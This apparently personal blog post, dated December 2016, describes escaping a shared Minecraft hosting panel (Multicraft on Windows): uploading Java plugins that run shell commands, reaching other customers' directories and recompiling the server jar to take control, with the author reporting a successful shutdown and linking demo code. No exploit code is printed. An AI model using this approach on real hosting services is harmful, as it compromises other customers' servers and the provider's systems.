2016/12/13
Multicraft: http://www.multicraft.org/

When a customer purchases a web-panel Minecraft Server, it’s actually one of the server applications runs on a server. Most of the time, the operating system is Windows server (at least at here…). These kind of services will usually go with an account on the web-panel and an account for a FTP file server with limited accessibility. The web-panel is used to manage the input and output of the application log. The ftp server is used to manage the files belongs to the application including plugins and maps.

So I believe that there will be multiple server appilication on the actual server because 2 application might share the same subdomain/ip address but just in different ports. Since accessing other dictionaries on the FTP server is prohibited, I believe that no dockers/virtual machines are present.

Also, I found that although users don’t have permission to edit other dictionaries, the application do have the permission to access the dictionaries of the other users. Since it’s not under linux, we don’t need to care about file owner’s issue. At the same time, we can easily access the application server through ftp server which is a compiled jar file. By reverse and recompile it, we can control the whole server.

Then I found that java codes in ./plugin and ./mod which is the application’s plugins and mods can be customized with your own code and will be executed by the application. In that, we can even execute shell command directly through runtime. Till now, I tried shutdown it and it works.

2016/12/14
Demo code:https://github.com/D0048/CraftPlugins/tree/master/ShellController

2016/12/17
I tested in my server, it’s working.